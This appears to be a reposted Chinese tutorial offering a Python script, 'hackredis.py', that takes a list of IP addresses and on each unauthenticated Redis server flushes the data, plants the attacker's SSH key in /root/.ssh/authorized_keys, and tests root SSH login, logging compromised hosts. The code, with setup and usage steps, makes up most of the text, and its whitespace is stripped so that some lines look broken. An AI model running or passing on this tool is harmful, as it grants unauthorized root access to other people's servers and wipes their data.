python脚本实现Redis未授权批量提权
前言
本文主要给大家介绍了关于redis未授权批量提权的相关内容,分享出来供大家参考学习,下面话不多说了,来一起看看详细的介绍吧。
安装依赖
sudoeasy_installredis
使用
redispythonhackredis.py usage:hackredis.py[-h][-lIPLIST][-pPORT][-rID_RSAFILE][-spSSH_PORT] ForExample: ----------------------------------------------------------------------------- pythonhackredis.py-lip.txt-p6379-rfoo.txt-sp22 optionalarguments: -h,--helpshowthishelpmessageandexit -lIPLISTthehostsoftarget -pPORTtheredisdefaultport -rID_RSAFILEthesshid_rsafileyougenerate -spSSH_PORTthesshport
首先需要ssh密钥:
ssh-keygen-trsa cp~/.ssh/id_rsa.pub/tmp/foo.txt
之后将ip列表填入ip.txt,然后就可以跑了。成功的将会输出到success.txt,执行成功但是ssh连接失败的会存储在unconnect.txt,操作失败的会存储在fail.txt。
#!/usr/bin/python
#coding:utf-8
#############################################################
##@filehackredis.py##
##@date2015-12-11##
##@authorevi1cg##
#############################################################
importredis
importargparse
importtextwrap
importsys
importpexpect
defgetargs():
parser=argparse.ArgumentParser(prog='hackredis.py',formatter_class=argparse.RawTextHelpFormatter,description=textwrap.dedent('''/
ForExample:
-----------------------------------------------------------------------------
pythonhackredis.py-lip.txt-p6379-rfoo.txt-sp22'''))
parser.add_argument('-l',dest='iplist',type=str,help='thehostsoftarget')
parser.add_argument('-p',dest='port',default=6379,type=int,help='theredisdefaultport')
parser.add_argument('-r',dest='id_rsafile',type=str,help='thesshid_rsafileyougenerate')
parser.add_argument('-sp',dest='ssh_port',type=int,default=22,help='thesshport')
if(len(sys.argv[1:])/2!=4):
sys.argv.append('-h')
returnparser.parse_args()
defhackredis(host,port):
ck=0
try:
print"[*]Attackingip:%s"%host
r=redis.StrictRedis(host=host,port=port,db=0,socket_timeout=2)
r.flushall
r.set('crackit',foo)
r.config_set('dir','/root/.ssh/')
r.config_set('dbfilename','authorized_keys')
r.save()
ck=1
except:
print"/033[1;31;40m[-]/033[0mSomethingwrongwith%s"%host
write(host,2)
ck=0
ifck==1:
check(host)
else:
pass
defcheck(host):
print'/033[1;33;40m[*]/033[0mCheckconnecting...'
try:
ssh=pexpect.spawn('sshroot@%s-p%d'%(host,ssh_port))
i=ssh.expect('[#/$]',timeout=2)
ifi==0:
print"/033[1;34;40m[+]/033[0mSuccess!"
write(host,1)
else:
pass
except:
print"/033[1;32;40m[-]/033[0mFailedtoconnect!"
write(host,3)
defwrite(host,suc):
ifsuc==1:
filesname='success.txt'
elifsuc==2:
filesname='fail.txt'
elifsuc==3:
filesname='unconnect.txt'
else:
pass
file_object=open(filesname,'a')
file_object.write(host+'/n')
file_object.close()
defmain():
globalfoo,ssh_port
paramsargs=getargs()
try:
hosts=open(paramsargs.iplist,"r")
except(IOError):
print"Error:Checkyourhostfilepath/n"
sys.exit(1)
port=paramsargs.port
ssh_port=paramsargs.ssh_port
try:
foo='/n/n/n'+open(paramsargs.id_rsafile,"r").readline()+'/n/n/n'
except(IOError):
print"Error:Checkyourwordlistpath/n"
sys.exit(1)
ips=[p.replace('/n','')forpinhosts]
foripinips:
hackredis(ip.strip(),port)
if__name__=="__main__":
main()
总结
以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流,谢谢大家对毛票票的支持。